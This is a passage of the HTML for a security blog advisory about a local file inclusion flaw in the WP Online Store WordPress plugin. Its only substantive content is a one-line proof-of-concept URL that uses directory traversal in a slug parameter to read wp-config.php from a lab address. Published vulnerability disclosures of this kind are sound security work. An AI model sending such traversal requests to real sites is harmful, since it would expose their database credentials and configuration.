			<div class="crayon-toolbar" data-settings=" mouseover hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span>
			<div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Toggle Line Numbers"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div>
			<div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div>
			<div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;">
http://192.168.80.130/wordpress/?slug=../../../wp-config.php</textarea></div>
			<div class="crayon-main" style="">
				<table class="crayon-table">
					<tr class="crayon-row">
				<td class="crayon-nums " data-settings="show">
					<div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-53c98e7809fe6793789827-1">1</div></div>
				</td>
						<td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-line" id="crayon-53c98e7809fe6793789827-1"><span class="crayon-i">http</span><span class="crayon-o">:</span><span class="crayon-c">//192.168.80.130/wordpress/?slug=../../../wp-config.php</span></div></div></td>
					</tr>
				</table>
			</div>
		</div>
<!-- [Format Time: 0.0005 seconds] -->
<p>&nbsp;</p>
					</div><!-- .entry-content -->
	
	<footer class="entry-meta">
										<span class="cat-links">
				Posted in <a href="https://charlieeriksen.github.io/category/advisories/" title="View all posts in Advisories" rel="category tag">Advisories</a>			</span>
			<span class="sep"> / </span>			
						
						<span class="tag-links">
				Tagged <a href="https://charlieeriksen.github.io/tag/lfi/" rel="tag">LFI</a>, <a href="https://charlieeriksen.github.io/tag/wordpress-plugin/" rel="tag">Wordpress plugin</a>, <a href="https://charlieeriksen.github.io/tag/wp-online-store/" rel="tag">WP Online Store</a>			</span>
			<span class="sep"> / </span>
							
				<span class="comments-link"><a href="https://charlieeriksen.github.io/2013/02/18/wordpress-online-store-local-file-inclusion-vulnerability/#comments" title="Comment on WordPress Online Store local file inclusion vulnerability">1 Comment</a></span>
		<span class="sep"> / </span>
				
					</footer><!-- #entry-meta -->
</article><!-- #post-173 -->

				
					<nav id="nav-below">
		<h2 class="assistive-text">Post navigation</h2>

		
		
						<div class="nav-previous"><a href="https://charlieeriksen.github.io/page/2/" ><span class="meta-nav">&larr;</span> Older posts</a></div>
				
						
		
	
	</nav><!-- #nav-below -->
	
			
			</div><!-- #content -->
		</div><!-- #primary -->

			<div id="secondary" class="widget-area" role="complementary">
			<aside id="text-2" class="widget widget_text"><h3 class="widget-title">Upcoming advisories</h3>			<div class="textwidget"><p>SA51412<br />
SA51348<br />
SA51344<br />
SA51336 </p>
</div>
		</aside><aside id="categories-4" class="widget widget_categories"><h3 class="widget-title">Categories</h3>		<ul>
	<li class="cat-item cat-item-3"><a href="https://charlieeriksen.github.io/category/advisories/" title="View all posts filed under Advisories">Advisories</a> (32)
</li>
	<li class="cat-item cat-item-12"><a href="https://charlieeriksen.github.io/category/privacy/" title="View all posts filed under Privacy">Privacy</a> (5)
</li>
	<li class="cat-item cat-item-30"><a href="https://charlieeriksen.github.io/category/security/" title="View all posts filed under Security">Security</a> (7)
</li>
		</ul>
</aside>		<aside id="recent-posts-4" class="widget widget_recent_entries">		<h3 class="widget-title">Recent posts</h3>		<ul>
					<li>
				<a href="https://charlieeriksen.github.io/2013/08/20/graphite-remote-code-execution-vulnerability-advisory/">Graphite remote code execution vulnerability advisory</a>
						</li>
					<li>
				<a href="https://charlieeriksen.github.io/2013/08/06/squash-remote-code-execution-vulnerability-advisory/">Squash remote code execution vulnerability advisory</a>
						</li>
					<li>
				<a href="https://charlieeriksen.github.io/2013/06/18/bsides-rhode-island-presentation-and-slides/">BSides Rhode Island presentation and slides</a>
						</li>
					<li>
				<a href="https://charlieeriksen.github.io/2013/05/24/cve-2012-6399-or-how-your-cisco-webex-meetings-arent-very-confidential-on-ios/">CVE-2012-6399 &#8211; Or how your Cisco WebEx meetings aren&#8217;t very confidential on iOS</a>
						</li>
					<li>
				<a href="https://charlieeriksen.github.io/2013/05/16/credit-card-numbers-third-parties-and-you/">Credit card numbers, third parties and you</a>
						</li>
					<li>
				<a href="https://charlieeriksen.github.io/2013/05/09/cve-2013-2692-or-when-your-openvpn-is-a-bit-too-open/">CVE-2013-2692 &#8211; Or when your OpenVPN is a bit too open</a>
						</li>
					<li>
				<a href="https://charlieeriksen.github.io/2013/05/03/conditional-csrf-or-how-to-spray-without-praying/">Conditional CSRF &#8211; Or how to spray without praying</a>
						</li>
					<li>
				<a href="https://charlieeriksen.github.io/2013/05/01/wordpress-csrf-exploit-kit-a-novel-approach-to-exploiting-wordpress-plugins/">WordPress CSRF Exploit kit &#8211; A novel approach to exploiting WordPress plugins</a>
						</li>
					<li>
				<a href="https://charlieeriksen.github.io/2013/03/17/amd-catalyst-driver-update-vulnerability/">AMD Catalyst driver update vulnerability</a>
						</li>
					<li>
				<a href="https://charlieeriksen.github.io/2013/02/18/wordpress-online-store-local-file-inclusion-vulnerability/">WordPress Online Store local file inclusion vulnerability</a>
						</li>
				</ul>
		</aside>		</div><!-- #secondary .widget-area -->
	
	</div><!-- #main -->
	
	
	<footer id="colophon" role="contentinfo">
		<div id="site-generator">
						<a href="http://wordpress.org/" title="Semantic Personal Publishing Platform" rel="generator">Powered by WordPress</a> &amp;	<a href="http://wpshoppe.com/" title="Minimalist WordPress Themes" rel="generator">simpleX</a>.
					
		</div>
	</footer><!-- #colophon -->
	
		
</div><!-- #page -->


</body>
</html>
<!-- Performance optimized by W3 Total Cache. Learn more: http://www.w3-edge.com/wordpress-plugins/

Page Caching using disk: enhanced

 Served from: ceriksen.com @ 2014-07-18 21:15:36 by W3 Total Cache -->